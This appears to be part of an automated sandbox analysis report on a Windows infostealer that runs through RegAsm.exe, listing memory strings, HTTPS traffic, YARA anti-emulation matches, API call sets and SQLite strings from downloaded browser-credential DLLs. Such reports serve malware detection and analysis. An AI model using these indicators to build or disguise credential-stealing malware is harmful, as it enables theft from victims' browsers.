                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/:
                  Source: KJKJJJ.2.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/FIEBFHIDBA
                  Source: KJKJJJ.2.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                  Source: KJKJJJ.2.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                  Source: KJKJJJ.2.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: KJKJJJ.2.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                  Source: KJKJJJ.2.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%2
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.2.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownHTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49710 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49712 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49719 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49720 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.5:49731 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004112FD _EH_prolog,memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

                  System Summary

                  Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 0.2.file.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C81B8C0 rand_s,NtQueryVirtualMemory,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C81B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C81B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7BF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB22A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB2ED0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC817B
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC4D2F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041C07A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041E190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041BB29
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041CCA7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7B35A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F5C10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C82AC00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F6CF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C802C10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7C6C80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7DED10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7CFD00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F0DD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C814EA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7D9E50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F3E50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F7E10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7BBEF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7CFEF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C819E30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C802E4E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C826E63
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7D5E90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7C9F00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7E6FF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7BDFE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7D8850
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7DD850
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7FB820
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7C7810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F58E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C804820
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C812990
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7CD960
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7DA940
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7ED9B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7BC9A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C80B970
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C82BA90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F9A60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C822AB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7D1AF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F8AC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7CCAB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7E4AA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8134A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C81C4A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7C5440
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7BD4E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C82542B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7DD4D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7C64C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C82545C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7E0512
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8185F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C81E680
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7BC670
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7D4640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8276E3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C805600
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8077A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F7710
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7FF070
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8250C7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7DC0E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7E60A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7F5190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C82B170
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7FE2F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7B22A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7CC370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7B5340
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8253C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7FD320
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7BF380
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C85ECC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8BECD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C926C00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C93AC30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C86AC60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8F6D90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C864DB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9ECDC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9E8D20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C98AD50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C92ED70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8E6E90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C86AEC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C900EC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C940E20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8FEE70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9A8FB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C86EFB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C93EFF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C860FE0
                  Source: C:\Users\user\Desktop\file.exeCode function: String function: 00AB6770 appears 51 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004024D7 appears 312 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C9E09D0 appears 37 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C7ECBE8 appears 134 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C7F94D0 appears 90 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004180A8 appears 104 times
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 0.2.file.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/27@1/2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C817030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004106C4 _EH_prolog,CoCreateInstance,SysAllocString,_wtoi64,SysFreeString,SysFreeString,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199686524322[1].htm
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5696:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2860:120:WilError_03
                  Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.ini
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                  Source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                  Source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                  Source: RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                  Source: RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                  Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                  Source: RegAsm.exe, 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                  Source: RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                  Source: HDGIJJ.2.dr, FCGCGD.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: RegAsm.exe, 00000002.00000002.2647272334.000000001B698000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2643922195.0000000015724000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                  Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
